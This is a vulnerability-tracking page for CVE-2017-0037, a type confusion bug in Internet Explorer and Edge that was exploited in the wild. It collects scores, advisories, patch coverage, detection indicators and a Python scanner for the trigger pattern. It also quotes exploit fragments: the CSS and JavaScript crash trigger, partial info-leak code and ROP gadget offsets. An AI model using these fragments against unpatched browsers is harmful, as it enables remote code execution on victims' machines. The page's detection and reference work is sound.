CVE-2017-0037
published 2017-02-26
Priority P1 · 87 · high · 8.1 CVSS 3.1
AV:N / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2022-04-18
Exploited in the wild
EPSS: 80.39% (99.6th percentile)
Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft_corporation | internet_browser | — | — |
| microsoft_corporation | internet_explorer | — | — |
| msrc | internet_explorer_10_on_windows_server_2012 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1607_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1607_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_rt_8.1 | — | — |
| msrc | internet_explorer_11_on_windows_server_2012_r2 | — | — |
| msrc | internet_explorer_11_on_windows_server_2016 | — | — |
| msrc | microsoft_edge_on_windows_10_for_32-bit_systems | — | — |
| msrc | microsoft_edge_on_windows_10_for_x64-based_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1511_for_32-bit_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1511_for_x64-based_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1607_for_32-bit_systems | — | — |
| msrc | microsoft_edge_on_windows_10_version_1607_for_x64-based_systems | — | — |
Detection & IOCs (extracted from sources)
Snort
SIDs: 41549-41556, 41561-41598, 41601-41602, 41605-41610, 41633-41634, 41763-41764, 41926-41961, 41964-41998
Indicators:
- The trigger requires a crafted CSS token sequence: `float` plus `column-count` on one class, `column-span: all` on another, and a TH element whose alignment is changed from JavaScript. Look for this DOM/CSS pattern in HTML content.
- The PoC triggers the crash by setting a stylesheet's `mediaText` to a long string of 'a' characters and then setting `th1.align` to "right"; monitor for dynamic `mediaText` writes combined with TH alignment changes in page script.
- The full exploit's info-leak stage appends an iframe to a textarea element, registers an onreadystatechange handler on the iframe document, and replaces a freed object during `form.reset()` (the snippet's own comment: "Object replaced here"); monitor for iframes dynamically appended to textarea elements with readystatechange handlers. This stage is a separate memory-corruption primitive rather than the column-span type confusion (the Exploit-DB entries that carry it are tagged CVE-2017-0059 on this page), so it identifies the combined exploit chain rather than CVE-2017-0037 alone.
- The exploit takes its ROP gadgets exclusively from PROPSYS.dll to bypass DEP/ASLR; PROPSYS.dll-based ROP chains (e.g., the XCHG EAX,ESP gadget at offset 0x0b473) in heap-spray content are a strong indicator of this exploit.
- CVE-2017-0037 is shared between Internet Explorer (MS17-006) and Edge (MS17-007) and was publicly disclosed (Project Zero issue 1011, 2017-02-26) before the 2017-03-14 fix; prioritize detection on unpatched IE 10/11 and Edge systems.
Caveats:
- The Snort SID ranges above cover the whole March 2017 Patch Tuesday bulletin set (MS17-006 through MS17-023), not CVE-2017-0037 alone; per-SID CVE mapping requires Snort.org or the Talos Management Center.
- The ROP gadget addresses (e.g., base_leaked_addr + 0x0b473 for XCHG EAX,ESP in PROPSYS.dll) are relative to the module base, which ASLR randomizes per process; the exploit performs an info leak first and derives the gadget addresses from the leaked base. Only the offsets are stable, and only for the PROPSYS.dll build the exploit was written against.
- The exploit PoC targets 32-bit IE tab processes; the Edge crash path differs slightly ("Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address").
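The DOM/CSS/script pattern in the indicator notes above can be checked mechanically. The scanner below is an added example written for this page, not code from any of the cited sources or a vendor rule; it scores an HTML document on the five indicators (float plus column-count in one rule, column-span: all in another, a TH element, a `mediaText` write and an `align` write in script). The regexes, the verdict tiers and the three sample documents are assumptions: the PoC-like sample reuses the page's CSS rules and `boom()` function, but its table markup is constructed.

```python
"""Heuristic content scanner for the CVE-2017-0037 trigger pattern.

Added example (not code from the page's sources or any vendor rule). It turns
the indicator notes above into a check that can run over fetched HTML in a
proxy, sandbox or mail gateway. Every regex and the sample documents below
are assumptions made for illustration.
"""
import re
from dataclasses import dataclass, field

# One compiled pattern per indicator. Patterns are case-insensitive and
# whitespace-tolerant because exploit-kit landing pages are usually minified.
INDICATORS = {
    # one CSS rule carrying both `float` and `column-count` (either order)
    "css_float_column_count": re.compile(
        r"\{[^}]*\bfloat\s*:[^}]*\bcolumn-count\s*:[^}]*\}"
        r"|\{[^}]*\bcolumn-count\s*:[^}]*\bfloat\s*:[^}]*\}",
        re.I | re.S,
    ),
    # a second rule spanning all columns
    "css_column_span_all": re.compile(r"\bcolumn-span\s*:\s*all\b", re.I),
    # the element whose alignment the PoC rewrites
    "th_element": re.compile(r"<th\b", re.I),
    # script rewriting a stylesheet's media list (the PoC's first step)
    "js_mediatext_write": re.compile(r"\.media\s*\.\s*mediaText\s*=(?!=)", re.I),
    # script rewriting an element's align attribute (the PoC's second step)
    "js_align_write": re.compile(r"\.align\s*=(?!=)\s*[\"']", re.I),
}


@dataclass
class ScanResult:
    verdict: str                 # "clean", "review" or "cve-2017-0037-trigger"
    matched: list = field(default_factory=list)


def scan_html(content: str) -> ScanResult:
    """Score one HTML document against the trigger pattern."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    have = set(hits)
    css_pair = {"css_float_column_count", "css_column_span_all"} <= have
    js_pair = {"js_mediatext_write", "js_align_write"} <= have
    if css_pair and js_pair and "th_element" in have:
        # layout half and script half both present: the full trigger
        return ScanResult("cve-2017-0037-trigger", hits)
    if css_pair and "th_element" in have:
        # the layout alone is legal CSS (multi-column tables exist): flag for review
        return ScanResult("review", hits)
    return ScanResult("clean", hits)


# --- constructed samples ---------------------------------------------------

# Resembles the Exploit-DB 41454 PoC: the CSS and boom() are the page's, the
# markup around them is an assumption.
POC_LIKE = """<html><head><style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style><script>
function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
}
</script></head><body onload="boom()">
<table><tr class="class1"><th id="th1">x</th><td class="class2"></td></tr></table>
</body></html>"""

# Ordinary multi-column page with a table header: must stay clean.
BENIGN = """<html><head><style>
.news { column-count: 3; column-gap: 2em; }
.sidebar { float: right; width: 30%; }
</style></head><body>
<table><tr><th>Header</th><td>cell</td></tr></table>
<div class="news">text</div></body></html>"""

# Minified layout half without the script half: worth a look, not a verdict.
LAYOUT_ONLY = ('<style>.a{float:left;column-count:2}.b{column-span:all}</style>'
               '<table><tr><th>h</th></tr></table>')


if __name__ == "__main__":
    for label, doc in (("poc", POC_LIKE), ("benign", BENIGN), ("layout", LAYOUT_ONLY)):
        r = scan_html(doc)
        print(f"{label:8s} {r.verdict:24s} {r.matched}")
```

Running the module prints one verdict line per sample. The `review` tier exists because the layout half alone is legal CSS; a document only becomes actionable when the script half is also present, and even then this is a content heuristic that script which builds the property names at runtime (bracket access on computed strings, for instance) will defeat, so it belongs beside the Snort coverage listed above, not instead of it.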
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.1 | HIGH | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.6 | HIGH | AV:N/AC:H/Au:N/C:C/I:C/A:C |
| vulncheck | — | 8.1 | HIGH | — |
| cisa | — | 8.1 | HIGH | — |
| vendor_msrc | — | 6.4 | MEDIUM | — |
CISA
Microsoft Edge and Internet Explorer Type Confusion Vulnerability
cisa·2022-03-28·CVSS 8.1
CVE-2017-0037 [HIGH] CWE-704 Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Vulnerability: Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Affected: Microsoft Edge and Internet Explorer
Microsoft Edge and Internet Explorer have a type confusion vulnerability in mshtml.dll, which allows remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-0037
Remediation Due Date: 2022-04-18
Microsoft
Microsoft Browser Memory Corruption Vulnerability
vendor_msrc·2017-03-14·CVSS 6.4
CVE-2017-0037 [HIGH] Microsoft Browser Memory Corruption Vulnerability
Microsoft Browser Memory Corruption Vulnerability
Description: A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers, and then convince
GHSA
GHSA-8xx2-2w6g-2ff2: Microsoft Internet Explorer 10 and 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted
ghsa_unreviewed·2022-05-17·CVSS 8.1
CVE-2017-0018 [HIGH] CWE-119 GHSA-8xx2-2w6g-2ff2: Microsoft Internet Explorer 10 and 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted
Microsoft Internet Explorer 10 and 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." This vulnerability is different from those described in CVE-2017-0037 and CVE-2017-0149.
GHSA
GHSA-xpg5-jv85-754h: Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSp
ghsa_unreviewed·2022-05-17
CVE-2017-0037 [HIGH] CWE-704 GHSA-xpg5-jv85-754h: Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSp
Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.
GHSA
GHSA-vrcm-c43w-vj64: The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web si
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-0049 [HIGH] CWE-200 GHSA-vrcm-c43w-vj64: The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web si
The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Scripting Engine Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0018, and CVE-2017-0037.
GHSA
GHSA-xqqj-2hmg-wc6r: Microsoft Internet Explorer 9 through 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craft
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2017-0149 [HIGH] CWE-119 GHSA-xqqj-2hmg-wc6r: Microsoft Internet Explorer 9 through 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craft
Microsoft Internet Explorer 9 through 11 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." This vulnerability is different from those described in CVE-2017-0018 and CVE-2017-0037.
VulnCheck
Microsoft Edge and Internet Explorer Type Confusion Vulnerability
vulncheck·2017·CVSS 8.1
CVE-2017-0037 [HIGH] CWE-704 Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Microsoft Edge and Internet Explorer Type Confusion Vulnerability
Microsoft Edge and Internet Explorer have a type confusion vulnerability in mshtml.dll, which allows remote code execution.
Affected: Microsoft Edge and Internet Explorer
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.threatstop.com/blog/bi-weekly-security-update-8/18/2017-0; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-04-18
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
exploitdb·2017-10-17
CVE-2017-0059 Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
---
```css
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
```
```javascript
var ntdllBase = "";
function infoleak() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");
  textarea.appendChild(frame);
  frame.contentDocument.onreadystatechange = eventhandler;
  form.reset();
}
function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  // Object replaced here
  // one of the side allocations of the audio element
  var j = document.createElement("canvas");
  ctx=j.getContext("2d");
  ctx.beginPath();
  ctx.moveTo(20,20);
  ctx.lineTo(20,100);
  ctx.lineTo(70,100);
  ctx.strokeStyle="red";
  ctx.strok
```
Exploit-DB
Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
exploitdb·2017-07-24
CVE-2017-0059 Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
---
```css
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
```
```javascript
var base_leaked_addr = "";
function infoleak() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");
  textarea.appendChild(frame);
  frame.contentDocument.onreadystatechange = eventhandler;
  form.reset();
}
function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  // Object replaced here
  // one of the side allocations of the audio element
  var audioElm = document.createElement("audio");
  audioElm.src = "test.mp3";
}
function writeu(base, offs) {
  var res = 0;
  if (base != 0) { res = base + offs }
  else { res = offs }
  re
```
Exploit-DB
Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
exploitdb·2017-02-24
CVE-2017-0037 Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
---
```css
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
```
```javascript
function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
}
```
Crash stack (Edge, 64-bit):
```text
'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageColl
```
Zscaler
Top Exploit Kit Activity Roundup - Summer 2017 | Zscaler
blogs_zscaler·2017-09-12
Top Exploit Kit Activity Roundup - Summer 2017 | Zscaler
Krebs
Adobe, Microsoft Push Critical Security Fixes
blogs_krebs·2017-03-14·CVSS 8.1
[HIGH] Adobe, Microsoft Push Critical Security Fixes
Adobe and Microsoft each pushed out security updates for their products today. Adobe plugged at least seven security holes in its Flash Player software. Microsoft, which delayed last month’s Patch Tuesday until today, issued an unusually large number of update bundles (18) to fix dozens of flaws in Windows and associated software.
Another critical patch (MS17-013) covers a slew of dangerous vulnerabilities in the way Windows handles certain image files. Malware or miscreants could exploit the flaws to foist malicious software without any action on the part the user, aside from perhaps just browsing to a hacked or booby-trapped Web site.
According to a blog post at the SANS Internet Storm Center, the image-handling flaw is one of six bulletins Microsoft released today which include vulner
Qualys
Massive Microsoft Patch Tuesday Security Update for March
blogs_qualys·2017-03-14·CVSS 7.8
[HIGH] Massive Microsoft Patch Tuesday Security Update for March
Today Microsoft released a massive Patch Tuesday security update consisting of 17 security bulletins that fixed a total of 134 vulnerabilities. Out of the 17 security bulletins 8 were marked as Critical which could lead to remote code execution while the remaining were marked as Important. Since there were no patches released for February, in one way, a massive update was expected this month. We also liked the fact that Microsoft kept the older way of clubbing KB articles and patches in security bulletins which, in our opinion, is easy to read and provides a better overall picture. But the Microsoft blog here alludes that sometime in the future Microsoft will stop publishing security bulletins.
The highest priority overall goes to the Windows GDI bulletin MS17-013 which could allow remote
Talos
Microsoft Patch Tuesday - March 2017
blogs_talos·2017-03-14·CVSS 4.3
[MEDIUM] Microsoft Patch Tuesday - March 2017
Following a sparse February patch Tuesday, today’s March release brings a bumper crop of fixed vulnerabilities: 17 bulletins covering 140 different vulnerabilities, 47 of which are rated as critical. The critical vulnerabilities affect Internet Explorer, Edge, Hyper-V, Windows PDF Library, Microsoft SMB Server, Uniscribe, Microsoft Graphics Component, Adobe Flash Player and Microsoft Windows. 92 vulnerabilities are rated as important, additionally affecting Active Directory Federation Services, DirectShow, Internet Information Services, Microsoft Exchange Server, Microsoft Office, Microsoft XML Core Services, Windows DVD Maker, Windows Kernel, Windows Kernel-Mode Drivers.
### Bulletins Rated Critical MS17-006, MS17-007, MS17-008, MS17-009, MS17-010, MS17-011, MS17-012, MS17-013 and MS17-0
Krebs
Adobe, Microsoft Push Critical Security Fixes – Krebs on Security
blogs_krebs·2017-03-01·CVSS 8.1
[HIGH] Adobe, Microsoft Push Critical Security Fixes – Krebs on Security
Adobe and Microsoft each pushed out security updates for their products today. Adobe plugged at least seven security holes in its Flash Player software. Microsoft, which delayed last month’s Patch Tuesday until today, issued an unusually large number of update bundles (18) to fix dozens of flaws in Windows and associated software.
Microsoft’s patch to fix at least five critical bugs in the Windows file-sharing service is bound to make a great deal of companies nervous before they get around to deploying this week’s patches. Most organizations block internal file-sharing networks from talking directly to their Internet-facing networks, but these flaws could be exploited by a malicious computer worm to spread very quickly once inside an organization with a great many unpatched Windows syste
Zscaler
Zscaler found Multiple Security Vulnerabilities | 03-14-2017
blogs_zscaler
Zscaler found Multiple Security Vulnerabilities | 03-14-2017
References
- http://www.securityfocus.com/bid/96088
- http://www.securitytracker.com/id/1037905
- http://www.securitytracker.com/id/1037906
- https://0patch.blogspot.si/2017/03/0patching-another-0-day-internet.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0037
- https://www.exploit-db.com/exploits/41454/
- https://www.exploit-db.com/exploits/42354/
- https://www.exploit-db.com/exploits/43125/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-0037
Timeline
- 2017-02-26: Published
- 2022-03-28: Added to CISA KEV
- Exploited in the wild